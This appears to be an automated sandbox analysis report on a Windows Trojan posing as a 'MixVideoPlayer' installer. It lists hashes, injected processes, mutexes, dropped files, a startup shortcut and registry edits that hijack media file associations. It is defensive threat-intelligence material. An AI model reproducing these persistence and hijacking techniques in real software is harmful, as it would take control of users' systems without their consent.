MD5: bb62ca4113a89ca6332d740ee6bd2fdb
SHA1: c8702c21dfbc6c213f700697170a1931f5d143d8
SHA256: 0044082049b34a178827c1ad2c135713a1520eb26ac81c5a6fa9828d6bf6c53e
SSDeep: 12288:nyjzsSygIlP4TaZHr2cdLYHvwKK1qFSl7ztVSCa7zHW/wT3URL3G5YQuzcl:nGQTMaZTIIPJtsCa7z2kU13iYQuzcl
Size: 688880 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-10 14:33:01
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mixvideoplayersetup.exe:460
WPFFontCache_v0400.exe:4048
DeleteTasks.exe:3024
LTV2.exe:556
LTV2.exe:1968
LTV2.exe:3828

The Trojan injects its code into the following process(es):

MixVideoPlayer.exe:1272
%original file name%.exe:908
BrowserWeb.exe:3820

Mutexes

The following mutexes were created/opened:

__DDrawCheckExclMode__
DDrawWindowListMutex
DDrawDriverObjectListMutex
__DDrawExclMode__
CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003
ShimCacheMutex
_!MSFTHISTORY!_
DBWinMutex
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!history!history.ie5!
WininetConnectionMutex
WininetStartupMutex
WininetProxyRegistryMutex
RasPbFile
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
oleacc-msaa-loaded
ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex

File activity

The process mixvideoplayersetup.exe:460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\MixVideoPlayer\Languages\ChineseT.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Swedish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Danish.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Hungarian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Estonian.ini (3 bytes)
%Program Files%\MixVideoPlayer\dotNetFx40_Full_setup.exe (30344 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovak.ini (3 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\BrowserWeb.exe (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (11 bytes)
%Program Files%\MixVideoPlayer\references\libreria.png (244 bytes)
%Program Files%\MixVideoPlayer\Languages\Norwegian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\German.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Slovenian.ini (3 bytes)
%Program Files%\MixVideoPlayer\PhotoLoader.dll (784 bytes)
%Program Files%\MixVideoPlayer\Languages\Czech.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\mixChecker.exe (27704 bytes)
%Program Files%\MixVideoPlayer\Languages\Polish.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\nsProcess.dll (4 bytes)
%Program Files%\MixVideoPlayer\references\Interop.SHDocVw.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Languages\Catalan.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\ChineseS.ini (3 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.affcode (3 bytes)
%Program Files%\MixVideoPlayer\uninstall.exe (4489 bytes)
%Program Files%\MixVideoPlayer\icon.ico (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\ZipDLL.dll (6360 bytes)
%Program Files%\MixVideoPlayer\Languages\Thai.ini (5 bytes)
%Program Files%\MixVideoPlayer\references\extvideo.png (146 bytes)
%Program Files%\MixVideoPlayer\references\extaudio.png (310 bytes)
%Program Files%\MixVideoPlayer\Languages\Russian.ini (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\MixVideoPlayer\references\ffmpeg.zip (873025 bytes)
%Program Files%\MixVideoPlayer\Languages\Bulgarian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hindi.ini (6 bytes)
%Program Files%\MixVideoPlayer\Languages\Latvian.ini (3 bytes)
%Program Files%\MixVideoPlayer\NLog.dll (14184 bytes)
%Program Files%\MixVideoPlayer\Languages\Italian.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Korean.ini (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\AccessControl.dll (13 bytes)
%Program Files%\MixVideoPlayer\Languages\French.ini (3 bytes)
%Program Files%\MixVideoPlayer\Languages\Romanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\icon-uninstall.ico (3616 bytes)
%Program Files%\MixVideoPlayer\Languages\Vietnamese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Newtonsoft.Json.dll (16944 bytes)
%Program Files%\MixVideoPlayer\references\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\FrameworkControl.exe (14184 bytes)
%Program Files%\MixVideoPlayer\references\Newtonsoft.Json.dll (15536 bytes)
%Program Files%\MixVideoPlayer\Languages\Indonesian.ini (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\Uninstall MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\HaitianCreole.ini (3 bytes)
%Program Files%\MixVideoPlayer\Windows\Thumbs.db (1856 bytes)
%Program Files%\MixVideoPlayer\Languages\Greek.ini (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Hebrew.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Finnish.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\NDde.dll (3616 bytes)
%Program Files%\MixVideoPlayer\taglib-sharp.dll (15536 bytes)
%Program Files%\MixVideoPlayer\mixUpdater.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg2.tmp (177700 bytes)
%Program Files%\MixVideoPlayer\Snowplow.Tracker.dll (784 bytes)
%Program Files%\MixVideoPlayer\MixVideoPlayer.exe (76078 bytes)
%Program Files%\MixVideoPlayer\Languages\Japanese.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Portuguese.ini (3 bytes)
%Program Files%\MixVideoPlayer\Sider.dll (5064 bytes)
%Program Files%\MixVideoPlayer\Windows\logopeq-icon.ico (9608 bytes)
%Program Files%\MixVideoPlayer\LTV2.exe (6 bytes)
%Program Files%\MixVideoPlayer\Controls\ifishplayer-icon2.ico (12536 bytes)
%Program Files%\MixVideoPlayer\Languages\Ukrainian.ini (5 bytes)
%Program Files%\MixVideoPlayer\Microsoft.Win32.TaskScheduler.dll (8560 bytes)
%Program Files%\MixVideoPlayer\mixvideoplayer.uidnum (23 bytes)
%Program Files%\MixVideoPlayer\Languages\Arabic.ini (4 bytes)
%Program Files%\MixVideoPlayer\Languages\Turkish.ini (3 bytes)
%Program Files%\MixVideoPlayer\references\ffmpeg.exe (202301 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MixVideoPlayer\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\references\folder.png (472 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\Languages\English.ini (3 bytes)
%Program Files%\MixVideoPlayer\Controls\Thumbs.db (1552 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Startup\WebBrowserMixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\Languages\Spanish.ini (3 bytes)
%Documents and Settings%\%current user%\Desktop\MixVideoPlayer.lnk (1 bytes)
%Program Files%\MixVideoPlayer\references\policy.2.0.taglib-sharp.config (377 bytes)
%Program Files%\MixVideoPlayer\DeleteTasks.exe (10 bytes)
%Program Files%\MixVideoPlayer\references\Thumbs.db (5 bytes)
%Program Files%\MixVideoPlayer\Languages\Lithuanian.ini (3 bytes)
%Program Files%\MixVideoPlayer\policy.2.0.taglib-sharp.dll (3 bytes)
%Program Files%\MixVideoPlayer\LTVNetSdk.dll (15 bytes)
%Program Files%\MixVideoPlayer\Languages\Dutch.ini (3 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsl1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\ZipDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\AccessControl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\NSISdl.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm3.tmp\nsProcess.dll (0 bytes)

The process MixVideoPlayer.exe:1272 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (501 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\log.txt (134 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\MainBanner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (326 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\banner[1].htm (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\analytics[1].js (740 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jquery.min[2].js (4547 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\mixvideoplayer\config\config.ini (252 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mixvideoplayer[1].txt (187 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4240 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jquery.min[1].js (3236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\analytics[1].htm (1 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery.min[1].js (3480 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (1002 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\ga[1].js (1691 bytes)

The Trojan deletes the following file(s):

%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jquery.min[1].js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp4.tmp (0 bytes)

The process %original file name%.exe:908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\loading-install[1].gif (74 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MixVideoPlayerSetup[1].exe (1718416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\loadingBar[1].gif (7527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\style[1].css (114 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\i-download[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\f6c0be2d-f27d-4e15-a611-17b6bfc0345c\mixvideoplayersetup.exe (1718416 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\bullet-short[1].gif (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\progress-bar[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\msjava[1].dll (465777 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\style[1].css (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\loadingBar[1].gif (12626 bytes)
%System%\wbem\Logs\wbemprox.log (228 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\fdd38805b7c819802cbd31bf75157c25b18344f46b22d1305ec5a34db400c252cc764e2deab801466f546f3fbea20ad7ff76bed97ca1888d[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\0a47f93be658c7bb00d558b4ec90421a71854a2101d389448776a4db9bb9613346e46f6b897f310e54c5e69f1cff337c65944ddcddf9c379[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\loadingBar[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\MixVideoPlayerSetup[1].exe (0 bytes)

Registry activity

The process mixvideoplayersetup.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\mixp.flv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp4]
"(Default)" = "mixp.mp4"

[HKCR\mixp.flv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.3gp\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\.mkv]
"(Default)" = "mixp.mkv"

[HKCR\mixp.aac]
"(Default)" = "mixp media file (.aac)"

[HKCR\.mpeg]
"(Default)" = "mixp.mpeg"

[HKCR\mixp.mkv\shell]
"(Default)" = "Play"

[HKCR\mixp.mkv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg\shell]
"(Default)" = "Play"

[HKCR\mixp.wmv]
"(Default)" = "mixp media file (.wmv)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".3gp" = ""

[HKCR\.flv]
"(Default)" = "mixp.flv"

[HKCR\.wma]
"mixp.backup" = "WMAFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayVersion" = "v1.0.0.22"

[HKCR\.mpg]
"(Default)" = "mixp.mpg"

[HKCR\.mov]
"(Default)" = "mixp.mov"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCR\mixp.wmv\shell]
"(Default)" = "Play"

[HKCR\.avi]
"(Default)" = "mixp.avi"

[HKCR\mixp.mp4\shell]
"(Default)" = "Play"

[HKCR\mixp.3gp\shell]
"(Default)" = "Play"

[HKCR\mixp.mp3\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCR\mixp.3gp\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.divx]
"(Default)" = "mixp media file (.divx)"

[HKCR\mixp.mkv]
"(Default)" = "mixp media file (.mkv)"

[HKCR\.wma]
"(Default)" = "mixp.wma"

[HKCR\.aif]
"(Default)" = "mixp.aif"

[HKCR\mixp.avi\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"mixp.backup" = "soundrec"

[HKCR\mixp.flv\shell]
"(Default)" = "Play"

[HKCR\.aif]
"mixp.backup" = "AIFFFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayIcon" = "%Program Files%\MixVideoPlayer\icon.ico"

[HKCR\mixp.mov\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.mpeg\shell\Play]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"Publisher" = "SoftForce LLC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"DisplayName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".AAC" = ""

[HKCR\mixp.aif\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.divx\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mp4\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpeg" = ""

[HKCR\mixp.wmv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mov]
"(Default)" = "mixp media file (.mov)"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".aif" = ""

[HKCR\mixp.3gp]
"(Default)" = "mixp media file (.3gp)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Internet Explorer\Styles]
"MaxScriptStatements" = "4294967295"

[HKCR\mixp.mov\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCR\mixp.mpg]
"(Default)" = "mixp media file (.mpg)"

[HKCR\mixp.mp4\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpeg]
"(Default)" = "mixp media file (.mpeg)"

[HKCR\mixp.divx\shell\Play]
"(Default)" = "Play"

[HKCR\.wav]
"(Default)" = "mixp.wav"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".flv" = ""

[HKCR\mixp.avi]
"(Default)" = "mixp media file (.avi)"

[HKCR\mixp.wma]
"(Default)" = "mixp media file (.wma)"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B DB 90 87 87 62 C9 55 7F 1A 90 07 16 01 72 95"

[HKCR\.divx]
"(Default)" = "mixp.divx"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".divx" = ""

[HKCR\mixp.mp4\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.avi\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".wma" = ""

[HKCR\Applications\MixVideoPlayer.exe]
"FriendlyAppName" = "MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mkv" = ""
".wmv" = ""

[HKCR\mixp.3gp\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "11001"

[HKCR\mixp.wav\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.wma\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wmv\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"EstimatedSize" = "44045"

[HKCR\mixp.wmv\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aif\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mpg\shell\Play]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\mixp.mp3\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.avi\shell]
"(Default)" = "Play"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MixVideoPlayer]
"UninstallString" = "%Program Files%\MixVideoPlayer\uninstall.exe"

[HKCR\mixp.mp4]
"(Default)" = "mixp media file (.mp4)"

[HKCR\Applications\MixVideoPlayer.exe]
"(Default)" = ""

[HKCR\mixp.mp3\shell\Play]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play]
"(Default)" = "Play"

[HKCR\.aac]
"(Default)" = "mixp.aac"

[HKCR\mixp.aif]
"(Default)" = "mixp media file (.aif)"

[HKCR\mixp.avi\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCR\mixp.mp3]
"(Default)" = "mixp media file (.mp3)"

[HKCR\.mp3]
"mixp.backup" = "mp3file"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".avi" = ""

[HKCR\.mpg]
"mixp.backup" = "mpegfile"

[HKCR\mixp.aif\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.flv]
"(Default)" = "mixp media file (.flv)"

[HKCR\mixp.divx\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.mkv\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCR\mixp.aac\shell]
"(Default)" = "Play"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCR\mixp.aac\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mpg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wav\shell]
"(Default)" = "Play"

[HKCR\mixp.wav\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mkv\shell\Play]
"(Default)" = "Play"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mov" = ""

[HKCR\mixp.mpg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.mov\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".MP3" = ""

[HKLM\SOFTWARE\MixVideoPlayer\MixVideoPlayer]
"InstallDir" = "%Program Files%\MixVideoPlayer"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mp4" = ""

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"BrowserWeb.exe" = "11001"

[HKCR\mixp.mpeg\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\mixp.wma\shell]
"(Default)" = "Play"

[HKCR\.wmv]
"mixp.backup" = "WMVFile"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\mixp.aif\shell]
"(Default)" = "Play"

[HKCR\mixp.aac\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCR\mixp.flv\shell\Play]
"(Default)" = "Play"

[HKCR\.3gp]
"(Default)" = "mixp.3gp"

[HKCR\.avi]
"mixp.backup" = "avifile"

[HKCR\.wmv]
"(Default)" = "mixp.wmv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".mpg" = ""

[HKCR\mixp.mpg\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play\command]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe /m %1"

[HKCR\.mp3]
"(Default)" = "mixp.mp3"

[HKCR\mixp.mpeg\DefaultIcon]
"(Default)" = "%Program Files%\MixVideoPlayer\MixVideoPlayer.exe"

[HKCR\mixp.wav]
"(Default)" = "mixp media file (.wav)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCR\Applications\MixVideoPlayer.exe\SupportedTypes]
".WAV" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCR\mixp.divx\shell]
"(Default)" = "Play"

[HKCR\.mpeg]
"mixp.backup" = "mpegfile"

[HKCR\mixp.mp3\shell]
"(Default)" = "Play"

[HKCR\mixp.wma\shell\Play]
"(Default)" = "Play"

The process WPFFontCache_v0400.exe:4048 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "14 21 B0 03 A6 97 12 99 E4 35 0C 04 1A 60 EC 65"

[HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

The process DeleteTasks.exe:3024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 9E 8E BC 92 B5 C9 53 4B 2A 70 B8 C0 50 01 2A"

The process MixVideoPlayer.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

